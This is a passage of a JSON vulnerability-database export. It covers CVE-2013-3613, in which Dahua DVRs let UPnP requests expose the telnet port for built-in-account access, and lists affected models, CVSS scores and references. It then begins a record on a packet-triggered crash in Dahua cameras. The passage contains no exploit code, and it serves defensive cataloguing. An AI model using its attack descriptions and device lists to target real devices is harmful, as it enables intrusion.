"model": "dvr1604hf-u-e",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr2104c",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr2104h",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr2104hc",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr2104he",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr2108c",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr2108h",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr2108hc",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr2108he",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr2116c",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr2116h",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr2116hc",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr2116he",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr2404hf-s",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr2404lf-al",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr2404lf-s",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr3204hf-s",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr3204lf-al",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr3204lf-s",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr3224l",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr3232l",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5104c",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5104h",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5104he",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5108c",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5108h",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5108he",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5116c",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5116h",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5116he",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5204a",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5204l",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5208a",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5208l",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5216a",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5216l",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5404",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5408",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5416",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5804",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5808",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr5816",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dvr6404lf-s",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "security dvr appliances",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13179"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004184"
},
{
"db": "NVD",
"id": "CVE-2013-3613"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-263"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr6404lf-s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0404hf-u-e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr1604hf-u-e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr3232l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr3204lf-s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0804hf-l-e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0804hf-a-e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0404hf-s-e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr1604hf-s-e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0804hf-al-e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5204l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5216l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0404hd-a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2108h:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5116c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2108he:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2104c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2116c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0404hd-l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0804hd-l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr1604hd-l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr3224l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr1604hf-a-e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5404:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5408:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5416:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5208a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5216a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5104h:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5108h:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2116he:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2104hc:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2108hc:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2116hc:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0404hd-u:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0404hd-s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0804:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr1604hd-s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr3204hf-s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2404lf-al:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr3204lf-al:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr1604hf-al-e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5804:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5808:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5816:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2116h:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5104he:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5108he:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5116he:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5104c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2404hf-s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0804hf-u-e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2404lf-s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0804hd-s:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr1604hf-l-e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0404hf-a-e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0804hf-s-e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr0404hf-al-e:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5208l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5204a:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5116h:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2104h:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr5108c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2104he:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dvr2108c:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-3613"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Andrey Bezborodov, Kirill Ermakov, Alexander Raspopov, and Dmitry Sklyarov of Positive Technologies.",
"sources": [
{
"db": "BID",
"id": "62402"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-263"
}
],
"trust": 0.9
},
"cve": "CVE-2013-3613",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 6.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.8,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2013-3613",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-13179",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-3613",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2013-13179",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201309-263",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13179"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004184"
},
{
"db": "NVD",
"id": "CVE-2013-3613"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-263"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua DVR appliances do not properly restrict UPnP requests, which makes it easier for remote attackers to obtain access via vectors involving a replay attack against the TELNET port. Digital video recorders (DVR) produced by Dahua Technology Co., Ltd. contain multiple vulnerabilities that could allow a remote attacker to gain privileged access to the devices. Dahua Security DVR Appliances accept UPnP requests from external untrusted devices, which can cause the telnet port of the DVR application device to be automatically redirected and accessed by external entities. These default conditions allow external attackers to detect the device and use the built-in account to authenticate. Access the device. \nAn attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-3613"
},
{
"db": "CERT/CC",
"id": "VU#800094"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004184"
},
{
"db": "CNVD",
"id": "CNVD-2013-13179"
},
{
"db": "BID",
"id": "62402"
}
],
"trust": 3.15
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#800094",
"trust": 4.1
},
{
"db": "NVD",
"id": "CVE-2013-3613",
"trust": 3.3
},
{
"db": "BID",
"id": "62402",
"trust": 1.5
},
{
"db": "JVN",
"id": "JVNVU99181254",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004184",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2013-13179",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201309-263",
"trust": 0.6
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#800094"
},
{
"db": "CNVD",
"id": "CNVD-2013-13179"
},
{
"db": "BID",
"id": "62402"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004184"
},
{
"db": "NVD",
"id": "CVE-2013-3613"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-263"
}
]
},
"id": "VAR-201309-0168",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13179"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-13179"
}
]
},
"last_update_date": "2023-12-18T12:09:08.237000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dahuasecurity.com/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004184"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-004184"
},
{
"db": "NVD",
"id": "CVE-2013-3613"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.3,
"url": "http://www.kb.cert.org/vuls/id/800094"
},
{
"trust": 0.8,
"url": "about vulnerability notes"
},
{
"trust": 0.8,
"url": "contact us about this vulnerability"
},
{
"trust": 0.8,
"url": "provide a vendor statement"
},
{
"trust": 0.8,
"url": "http://www.dahuasecurity.com/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3613"
},
{
"trust": 0.8,
"url": "http://jvn.jp/cert/jvnvu99181254"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-3613"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/62402"
},
{
"trust": 0.3,
"url": "http://www.dahuasecurity.com/products_category/dvr-2.html"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#800094"
},
{
"db": "CNVD",
"id": "CNVD-2013-13179"
},
{
"db": "BID",
"id": "62402"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004184"
},
{
"db": "NVD",
"id": "CVE-2013-3613"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-263"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#800094"
},
{
"db": "CNVD",
"id": "CNVD-2013-13179"
},
{
"db": "BID",
"id": "62402"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-004184"
},
{
"db": "NVD",
"id": "CVE-2013-3613"
},
{
"db": "CNNVD",
"id": "CNNVD-201309-263"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-09-13T00:00:00",
"db": "CERT/CC",
"id": "VU#800094"
},
{
"date": "2013-09-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-13179"
},
{
"date": "2013-09-13T00:00:00",
"db": "BID",
"id": "62402"
},
{
"date": "2013-09-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-004184"
},
{
"date": "2013-09-17T12:04:24.757000",
"db": "NVD",
"id": "CVE-2013-3613"
},
{
"date": "2013-09-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201309-263"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-12-04T00:00:00",
"db": "CERT/CC",
"id": "VU#800094"
},
{
"date": "2013-09-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-13179"
},
{
"date": "2013-09-13T00:00:00",
"db": "BID",
"id": "62402"
},
{
"date": "2013-09-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-004184"
},
{
"date": "2013-09-17T18:35:37.030000",
"db": "NVD",
"id": "CVE-2013-3613"
},
{
"date": "2017-05-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201309-263"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201309-263"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua Security DVRs contain multiple vulnerabilities",
"sources": [
{
"db": "CERT/CC",
"id": "VU#800094"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201309-263"
}
],
"trust": 0.6
}
}
VAR-202206-2212
Vulnerability from variot - Updated: 2023-12-18 11:51When an attacker obtaining the administrative account and password, or through a man-in-the-middle attack, the attacker could send a specified crafted packet to the vulnerable interface then lead the device to crash. ipc-hdbw2431e-s-s2 firmware, ipc-hdbw2831e-s-s2 firmware, ipc-hdbw2230e-s-s2 firmware etc. Dahua Technology Co., Ltd There are unspecified vulnerabilities in the product.Information is obtained and service operation is interrupted (DoS) It may be in a state. Dahua IPC-HFW2XXX, etc. are all products of China Dahua (Dahua) company. Dahua IPC-HFW2XXX is an IP camera. Dahua IPC-HDBW2XXX is a series of cameras. Dahua ASI7XXXX is a series of face recognition access controller
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202206-2212",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ipc-hfw2239m-as-led-b-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hdbw2431r-zas-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hdbw2831e-s-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hfw2531s-s-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "asi7223x-a-t1",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2021-09"
},
{
"model": "ipc-hfw2239s-sa-led-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "ipc-hdbw2431e-s-s2",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2022-04"
},
{
"model": "asi7213x-t1",
"scope": "lt",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": "2021-09"
},
{
